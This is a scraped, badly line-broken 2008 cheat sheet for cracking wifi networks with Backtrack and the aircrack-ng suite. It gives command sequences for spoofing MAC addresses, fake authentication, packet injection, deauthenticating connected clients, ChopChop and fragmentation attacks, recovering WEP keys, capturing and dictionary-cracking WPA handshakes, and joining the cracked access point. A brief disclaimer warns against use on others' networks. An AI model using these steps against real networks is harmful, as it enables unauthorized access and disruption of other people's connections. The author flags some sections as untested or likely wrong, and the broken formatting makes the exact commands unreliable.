*******************************************************uv1.4 (10/24/08 ...

sacktoysSoftware and s/w Development

Dec 13, 2013 (3 years and 5 months ago)

83 views

*******************************************************uv1.4 (10/24/08) | *

* Réalised on Backtrack 3.0 Final (compatible BT2.0Final & BT3.0Beta) *

* If you have many suggestions contact ronaak42 (AT) gmail (DOT) com *

* Language: English







*

* Copyright: Ronaak







*

*









*

* NB: Do NOT use these methods for hack another network that your own *

*









*

* Help: $_ ==> variable







*

* // ==> comment







*

* [] ==> optionnal command





*

*

/ ==> or this other command





*

*









*

* Hardware used: Macbook (Intel) With VMWare




*

*



Alfa AWUS036H (500mA) | Alfa AWUS036s



*

**************************************
***********************************


// for Alfa AWUS036H (500mA):

$_Interface = wlan0

// for Alfa AWUS036s:

// $_Interface = rausb0


1°) Start Backtrack

VMWare ==> BT3 Graphics mode (VESA Mode)

Real Boot ==> BT3 Graphics mode (KDE)


BT2:

Login ==> root

P
asswd ==> toor

startx



2°) Config Wifi Card

// for Alfa AWUS036H (500mA) on LINUX (other than BT2 & BT3):

wget
http://ronaak.eu/rtl8187_linux_26.1010.zip

unzip rtl8187_linux_26.1010.zip

cd rtl8187_linux_26.1010.0622.2006/

wget
http://ronaak.eu/rtl8187_1010.0622v2.patch

tar xzf drv.tar.gz

tar xzf stack.tar.gz

patch
-
Np1
-
i rtl8187_1010.
0622v2.patch


// for USB Key:

mkdir usb

mount /dev/sdb usb/

konqueror [&]



[ifconfig $_Interface down]

[macchanger
-
m $_NEW_@MAC / ifconfig $_Interface hw ether $_NEW_@MAC]

ifconfig $_Interface up / airmon
-
ng [start $_Interface]

[iwconfig $_Interface mode

monitor]



=================================WEP
KEY=================================

// This part was tested but some errors can be found.



3°) Scan Wifi Network

airodump
-
ng
--
write $_Output_File [
--
channel $_Nu
mberChannel] [
--
bssid $_@MAC_AP] [
--
encrypt
"WEP/WPA"] $_Interface



4°) Fake authentication

aireplay
-
ng
-
1 0 [
-
e $_ESSID]
-
a $_@Mac_AP
-
h $_@MAC_Station $_Interface

==> 0: time elapsed between 2 tries.



5°) Injections of packets

// Connected and valided
Client NOT Needed but recommanded


// Injection test

aireplay
-
ng
-
9 [
-
e $_ESSID] [
-
a $_@Mac_AP] [
-
i wlan1] wlan0

==>
-
i wlan1: is interface name of the second card if you want to determine which attacks your card
supports. This interfaces acts as an AP and

receives packets.

==> wlan0: is the interface name or airserv
-
ng IP Address plus port number. This interface is used to
send packets. For example
-

127.0.0.1:666. (Mandatory)

// IMPORTANT: You must set your card to monitor mode and to the desired channel
with airmon
-
ng prior
to running any of the tests.


// ARP:

aireplay
-
ng
-
3 [
-
e $_ESSID]
-
b $_@MAC_AP
-
h $_@MAC_Station [
-
x $_Injection_Speed] $_interface

==> $_Injection_Speed = 600 (default) | Adjust to signal power (Be careful can down AP)

// Disconnect

Current Client:

aireplay
-
ng
-
0 1
-
a $_@MAC_AP
-
c $_@MAC_Station $_Interface

==> 1: is the number of deauths to send (you can send multiple if you wish); 0 means send them
continuously


// ChopChop (xor):

aireplay
-
ng
-
4
-
h $_@MAC_Station
-
b $_@MAC_AP $_I
nterface

tcpdump
-
s 0
-
n
-
e
-
r $_Output_File

packetforge
-
ng
-
0
-
a $_@MAC_AP
-
h $_@MAC_Station
-
k $_@Ip_Station
-
l $_@Ip_AP
-
y
$_XOR_File
-
w $_ARP_faked_name

==>
-
0: type of packet to be forged. 0 for ARP

==>
-
k: Ip founded with tcpdump (ex: 192.168.0.3)

==>
-
l: Ip founded with tcpdump (ex: 192.168.0.254)

==>
-
y: Output filename of attack ChopChop (*.xor)

==>
-
w: Output filename will be genereted by packetforge
-
ng

aireplay
-
3 [
-
e ESSID]
-
b $_@MAC_AP
-
h $_@MAC_Station [
-
x Injection_Speed]
-
r
$_ARP_faked_nam
e $_Interface


// Fragment:

// Same options as ChopChop attack

aireplay
-
ng
-
5
-
b $_@MAC_AP
-
h $_@MAC_Station $_Interface

packetforge
-
ng
-
0
-
a $_@MAC_AP
-
h $_@MAC_Station
-
k $_@Ip_Station
-
l $_@Ip_AP
-
y
$_XOR_File
-
w $_ARP_faked_name

aireplay
-
ng
-
2
-
r $_AR
P_faked_name $_Interface


// Natural Packet Replay:

aireplay
-
ng
-
2
-
b $_@MAC_AP
-
d FF:FF:FF:FF:FF:FF
-
t 1 $_Interface

==>
-
d FF:FF:FF:FF:FF:FF: selects packets with a broadcast destination

==>
-
t 1: selects packets with the “To Distribution System” flag se
t on


// Modified Packet Replay:

aireplay
-
ng
-
2
-
b $_@MAC_AP
-
t 1
-
c FF:FF:FF:FF:FF:FF
-
p 0841 [
-
h $_@MAC_Station]
$_Interface

==>
-
c FF:FF:FF:FF:FF:FF: sets the destination MAC address to be a broadcast. This is
required to cause the AP to replay the pack
et and thus getting the new IV.

==>
-
t 1: selects packets with the “To Distribution System” flag set on

==>
-
p 0841: sets the Frame Control Field such that the packet looks like it is being sent
from a wireless client.



6°) IVS

300 000 IVs ==> WEP Key 64b
its

1 000 000 IVs ==> WEP Key 128bits

3 000 000 IVs ==> WEP Key 256bits



7°) Crack WEP

aircrack
-
ng [
-
n 64/128/256]
-
x $_Output_File [
-
f 2
-
12] [
-
k] [
-
0]

==>
-
0 : Colorie l'ecran en vert à la matrix

==>
-
f : Fudge factor between 2 et 12 (Default: 2)

==>
-
k : Don't activate chosen Korek's attack (between 1 et 17)



8°) PTW

// Efficient if they have ARP a lot

// 40 000 Ivs needed instead of de 1 000 000 IVs for WEP Key 128bits

// with same options that 7°)

aircrack
-
ng [
-
P] [1]
-
z $_Output_File

==>
-
P: P
TW debug mode

==> 1: disable Klein (for Modified Packet Replay)



9°) Connection to AP

iwconfig $_Interface

iwconfig $_Interface mode managed

iwconfig $_Interface key $_Clef_WEP

dhcpcd $_Interface

ping
www.google.com

// if no answer maybe a DNS problem

ping 91.121.147.12

// if no answer too maybe an IP Address problem

wireshark



=================================WPA
KEY=================================

// This part was NOT tested maybe some errors can be found.



3°) Scan Wifi Network

airodump
-
ng
--
write $_Output_File [
--
channel $_NumberChannel] [
--
bssid $_@MAC_AP] [
--
encrypt
"WEP/
WPA"] $_Interface



4°) Disconnect Current Clients

// Connected and valided Client Needed

aireplay
-
ng
-
0 1
-
a $_@Mac_AP
-
c $_@Mac_Station $_Interface

[aireplay
-
ng
-
0 0
-
a $_@Mac_AP $_Interface]



5°) HandShake Check

aircrack
-
ng $_Output_File



6°) Install
Dictionnary for BruteForce

// Internet Needed or have beforehand download file ==> lower.gz (or another BruteForce Dictionnary)

cd /root

[wget
http://ronaak.eu/lower.gz
]

zcat lower.gz | egrep
-
v '^#' > dico.txt

// to make this symbol ">", put the Keyboard in US and do Shift + >



7°) BF WPA (many hours needed xD)

aircrack
-
ng
-
w /root/dico.txt [
-
0] $_Output_File




) Rainbow tables (if step 7° failed)

// This functionality will be available in a future release. It is NOT available currently.

// Internet Needed or to have beforehand download file ==> aircrack
-
ng
-
1.0
-
beta2.tar.gz

// 3 files are needed:

// $_Output_File

(.cap) packaging handshake

// dico.txt packaging the list of passwords for BruteForce

// a file named essid.txt packaging essid's AP (with only one row | for pre
-
computer a table with many
essid put one essid by row into this file)


Old method:

// always
operational?

cd /root

svn co
http://trac.aircrack
-
ng.org/svn/branch/1.0
-
dev/

aircrack
-
ng

cd aircrack
-
ng

make SQLITE=true

make SQLITE=true install


New method:

// ERROR 404: NOT FOUND for this URL:

wget
http://download.aircrack
-
ng.org/aircrack
-
ng
-
1.0
-
beta2.tar.gz

// Or you can try this:

// Be careful ==> Bad CheckSum 997d5623893a18e5d392fb5f36cae805 instead of
66017aad4f23153419fd
b04c83e65aaf

// Downloaded on
http://www.stsp.
name/openbsd/ports/aircrack
-
ng
-
1.0
-
beta2.tar.gz

wget
http://ronaak.eu/aircrack
-
ng
-
1.0
-
beta2.tar.gz

tar
-
zxvf aircrack
-
ng
-
1.0
-
beta2.tar.gz

cd aircrack
-
ng
-
1.0
-
beta2

make

make install

make SQLI
TE=true

make SQLITE=true install


cd /root

airolib
-
ng crackwpa
--
import passwd /root/dico.txt

airolib
-
ng crackwpa
--
import essid /root/essid.txt

airolib
-
ng crackwpa
--
stats

airolib
-
ng
--
clean all

// Lot of RAM & Time needed xD

airolib
-
ng crackwpa
--
batch

/
/ Lot of RAM & Time needed but registered xD

[airolib
-
ng crackwpa
--
verify all]


==> crack WPA:

// very fast ==> 17000 pwd/s ;)

aircrack
-
ng
-
r crackwpa $_Output_File



9°) Connection to AP

iwconfig $_Interface

iwconfig $_Interface mode managed

// Probably
not the good command:

iwconfig $_Interface key $_Clef_WPA

dhcpcd $_Interface

ping
www.google.com

// if no answer maybe a DNS problem

ping 91.121.147.12

// if no answer too maybe an IP Address problem

wireshark